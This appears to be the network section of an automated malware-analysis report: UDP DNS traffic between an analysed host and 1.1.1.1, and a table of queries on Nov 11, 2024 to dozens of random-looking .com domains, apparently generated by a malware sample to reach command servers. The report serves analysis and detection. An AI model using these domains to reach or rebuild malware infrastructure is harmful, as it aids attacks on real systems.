Nov 11, 2024 18:14:52.337578058 CET	53	56640	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.341279984 CET	53	60895	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.342479944 CET	53	60091	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.343429089 CET	53	53637	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.345133066 CET	53	64257	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.348990917 CET	53	58581	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.349941015 CET	53	62924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.350984097 CET	53	52757	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.351394892 CET	60556	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.361160040 CET	53	60556	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.362102985 CET	53	55745	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.363790035 CET	63413	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.364044905 CET	49792	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.364217043 CET	62082	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.364329100 CET	51698	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.364510059 CET	62493	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.364651918 CET	53940	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.369400024 CET	53287	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.369714975 CET	64230	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.369874954 CET	51272	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.369946003 CET	53854	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.370064974 CET	52256	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.370141983 CET	49561	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.370249987 CET	53904	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.370316029 CET	62969	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.370970964 CET	51089	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.371172905 CET	53	49792	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.371392965 CET	49349	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.371628046 CET	51728	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.374010086 CET	53	62082	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.374042988 CET	53	51698	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.374078989 CET	53	63413	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.374277115 CET	58203	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.374516010 CET	65151	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.375988007 CET	49819	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.376708984 CET	49910	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.377469063 CET	55096	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.377526999 CET	56121	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.377697945 CET	55733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.377720118 CET	49924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.377888918 CET	64328	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.377984047 CET	53	51089	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.378844976 CET	53	64230	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.378947020 CET	53	51272	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.379409075 CET	53	53287	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.379667044 CET	53	53854	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.380871058 CET	53	52256	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.381411076 CET	53	58203	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.381587029 CET	53	51728	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.385986090 CET	53	49819	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.386380911 CET	53	55096	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.387008905 CET	53	55733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.387911081 CET	53	56121	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.389161110 CET	54395	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.389869928 CET	55230	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.390172005 CET	51480	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.390633106 CET	60528	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.390719891 CET	54061	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.390810966 CET	64063	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.390923977 CET	59680	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.390973091 CET	57776	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.393615961 CET	56826	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.394156933 CET	54790	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.394202948 CET	53292	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.394395113 CET	59086	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.394469023 CET	65409	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.395459890 CET	53	53940	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.395951033 CET	53	62493	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.398183107 CET	53	60528	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.399776936 CET	60952	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.401374102 CET	53	54790	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.401426077 CET	53	54061	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.401626110 CET	53	65409	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.401925087 CET	53	49349	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.402431011 CET	53	49561	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.403537035 CET	53	56826	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.404320955 CET	59155	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.404335976 CET	57684	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.404441118 CET	53	51480	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.406949997 CET	53	49910	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.408780098 CET	53	60952	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.408795118 CET	53	64328	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.414619923 CET	53	59155	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.419230938 CET	53	54395	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.420999050 CET	53	57776	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.421703100 CET	53	55230	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.421833038 CET	53	64063	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.421978951 CET	53	59680	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.425667048 CET	53	53292	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.435834885 CET	53	57684	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.505532026 CET	53	56976	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.511306047 CET	53	57697	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.525607109 CET	53	56598	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.527156115 CET	53	65520	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.558777094 CET	53	53904	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.572365999 CET	53	62969	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.572623014 CET	53	51042	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.581875086 CET	53	59086	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.595557928 CET	53	65151	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.625622034 CET	53	49924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.864609957 CET	59741	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.887693882 CET	53	59741	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.559526920 CET	65035	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.559528112 CET	62042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.570791006 CET	55046	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.571510077 CET	50184	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.574357986 CET	49504	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.575880051 CET	51534	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.575880051 CET	49859	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.576816082 CET	59402	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.577622890 CET	52600	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.577775002 CET	64250	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.578773975 CET	53700	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.580812931 CET	50506	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.580812931 CET	55296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.581500053 CET	58110	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.582324982 CET	49240	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.582324982 CET	51041	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.582788944 CET	57945	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.584439039 CET	63969	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.584439039 CET	59044	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.585284948 CET	59763	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.588001966 CET	57581	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.590327024 CET	60019	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.591521025 CET	56840	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.592483997 CET	64513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.594722033 CET	56082	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.596915007 CET	58197	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.598718882 CET	51338	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.598718882 CET	52777	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.599855900 CET	59408	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.601552010 CET	56944	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.604542971 CET	54897	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.604862928 CET	61384	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.606789112 CET	64919	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.606925964 CET	51519	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.610119104 CET	64983	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.610119104 CET	54550	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.612088919 CET	49226	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.612088919 CET	57848	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.613431931 CET	54512	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.613432884 CET	53856	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.615137100 CET	58236	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.616738081 CET	51286	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.618119955 CET	64181	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.619657040 CET	61307	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.620714903 CET	55058	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.621684074 CET	63701	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.623671055 CET	55197	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.624412060 CET	60986	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.625715971 CET	52937	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.625715971 CET	53412	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.628927946 CET	57398	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.628927946 CET	57749	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.630393982 CET	49910	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.632217884 CET	55455	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.632217884 CET	64062	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.633241892 CET	58239	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.634788990 CET	51210	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.635451078 CET	61494	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.636904955 CET	57514	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.636904955 CET	62672	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.638010025 CET	49988	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.638969898 CET	54427	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.640263081 CET	53141	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.640485048 CET	52883	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:59.806469917 CET	53	51534	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.806592941 CET	53	55296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.806806087 CET	53	58110	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.806890965 CET	53	59763	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807117939 CET	53	50184	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807141066 CET	53	51338	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807177067 CET	53	65035	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807362080 CET	53	57581	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807384968 CET	53	51286	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807432890 CET	53	64919	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807442904 CET	53	57945	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807616949 CET	53	53856	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807627916 CET	53	64983	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807637930 CET	53	56082	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807748079 CET	53	51519	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807758093 CET	53	57398	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807786942 CET	53	57749	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.807900906 CET	53	49910	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808085918 CET	53	52883	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808137894 CET	53	56840	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808146954 CET	53	53412	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808161974 CET	53	64181	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808198929 CET	53	50506	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808321953 CET	53	61307	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808532000 CET	53	53141	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808554888 CET	53	63701	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808638096 CET	53	64513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808648109 CET	53	52777	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808656931 CET	53	49988	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808685064 CET	53	53700	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808734894 CET	53	61384	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808782101 CET	53	60986	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.808814049 CET	53	58239	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.809271097 CET	53	49226	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.809505939 CET	53	58236	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.809515953 CET	53	52937	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.809524059 CET	53	54427	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.810081005 CET	53	64062	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.810411930 CET	53	56944	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.810648918 CET	53	61494	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.812470913 CET	53	59402	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.818805933 CET	53	55046	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.826658010 CET	53	49859	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.827747107 CET	53	60019	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.827841997 CET	53	57848	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.827964067 CET	53	54897	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.828227997 CET	53	51041	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.828272104 CET	53	52600	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.828310966 CET	53	59044	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.828344107 CET	53	49504	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.828890085 CET	53	49240	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829096079 CET	53	54512	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829107046 CET	53	55455	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829121113 CET	53	54550	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829132080 CET	53	64250	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829169989 CET	53	58197	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829488039 CET	53	57514	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.829591990 CET	53	59408	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.830410004 CET	53	55197	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.831507921 CET	53	62672	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:59.836481094 CET	53	55058	1.1.1.1	192.168.2.6
Nov 11, 2024 18:15:00.000912905 CET	53	51210	1.1.1.1	192.168.2.6
Nov 11, 2024 18:15:00.009227991 CET	53	63969	1.1.1.1	192.168.2.6
Nov 11, 2024 18:15:00.376717091 CET	53	62042	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 18:13:00.481395960 CET	192.168.2.6	1.1.1.1	0x1342	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.481751919 CET	192.168.2.6	1.1.1.1	0xe520	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.482038021 CET	192.168.2.6	1.1.1.1	0xec54	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.482369900 CET	192.168.2.6	1.1.1.1	0xb947	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.482758045 CET	192.168.2.6	1.1.1.1	0x1f6d	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.483153105 CET	192.168.2.6	1.1.1.1	0x5db6	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.488621950 CET	192.168.2.6	1.1.1.1	0xce56	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.490200043 CET	192.168.2.6	1.1.1.1	0xfa3	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.491722107 CET	192.168.2.6	1.1.1.1	0xc447	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.493396044 CET	192.168.2.6	1.1.1.1	0x5d4	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.494980097 CET	192.168.2.6	1.1.1.1	0x6e7e	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.496607065 CET	192.168.2.6	1.1.1.1	0x3ea7	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.497773886 CET	192.168.2.6	1.1.1.1	0x51a1	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.499360085 CET	192.168.2.6	1.1.1.1	0xde63	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.500377893 CET	192.168.2.6	1.1.1.1	0x7b8d	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.529314041 CET	192.168.2.6	1.1.1.1	0x3295	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.531327963 CET	192.168.2.6	1.1.1.1	0x3f7e	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.550781965 CET	192.168.2.6	1.1.1.1	0x4680	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.551907063 CET	192.168.2.6	1.1.1.1	0x5bd5	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.581959963 CET	192.168.2.6	1.1.1.1	0xd619	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.597763062 CET	192.168.2.6	1.1.1.1	0xdfeb	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.599937916 CET	192.168.2.6	1.1.1.1	0x7fd8	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.600162029 CET	192.168.2.6	1.1.1.1	0x5cbe	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.629055023 CET	192.168.2.6	1.1.1.1	0x6383	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.629107952 CET	192.168.2.6	1.1.1.1	0xd69b	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.660089970 CET	192.168.2.6	1.1.1.1	0x6265	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.660089970 CET	192.168.2.6	1.1.1.1	0x78bb	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.691600084 CET	192.168.2.6	1.1.1.1	0x66e1	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.691600084 CET	192.168.2.6	1.1.1.1	0xbbf2	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.722234011 CET	192.168.2.6	1.1.1.1	0xb32	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.722274065 CET	192.168.2.6	1.1.1.1	0x5760	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.753813028 CET	192.168.2.6	1.1.1.1	0x9721	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.754457951 CET	192.168.2.6	1.1.1.1	0x5bab	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.785571098 CET	192.168.2.6	1.1.1.1	0x4c7	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.785768032 CET	192.168.2.6	1.1.1.1	0x446c	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.816495895 CET	192.168.2.6	1.1.1.1	0x45f2	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.816895008 CET	192.168.2.6	1.1.1.1	0x1546	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.847624063 CET	192.168.2.6	1.1.1.1	0x377b	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.847690105 CET	192.168.2.6	1.1.1.1	0xc575	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.881185055 CET	192.168.2.6	1.1.1.1	0x6115	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.885456085 CET	192.168.2.6	1.1.1.1	0x8319	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.916687012 CET	192.168.2.6	1.1.1.1	0x8df3	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.917965889 CET	192.168.2.6	1.1.1.1	0xf4b8	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.920185089 CET	192.168.2.6	1.1.1.1	0x20b1	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.920361996 CET	192.168.2.6	1.1.1.1	0xc064	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.920533895 CET	192.168.2.6	1.1.1.1	0x1b48	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.943258047 CET	192.168.2.6	1.1.1.1	0x966	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.967644930 CET	192.168.2.6	1.1.1.1	0x8fa4	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.973874092 CET	192.168.2.6	1.1.1.1	0xe554	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.974134922 CET	192.168.2.6	1.1.1.1	0x2dd2	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.974189043 CET	192.168.2.6	1.1.1.1	0xddc4	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.974340916 CET	192.168.2.6	1.1.1.1	0x8db0	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.974416018 CET	192.168.2.6	1.1.1.1	0xda4c	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.974817991 CET	192.168.2.6	1.1.1.1	0x86a9	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.991792917 CET	192.168.2.6	1.1.1.1	0x172a	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.992124081 CET	192.168.2.6	1.1.1.1	0xf1c3	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.994189024 CET	192.168.2.6	1.1.1.1	0xc336	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.997484922 CET	192.168.2.6	1.1.1.1	0x4da6	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.997770071 CET	192.168.2.6	1.1.1.1	0xed6c	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.998136044 CET	192.168.2.6	1.1.1.1	0x8986	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.003547907 CET	192.168.2.6	1.1.1.1	0xe01a	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
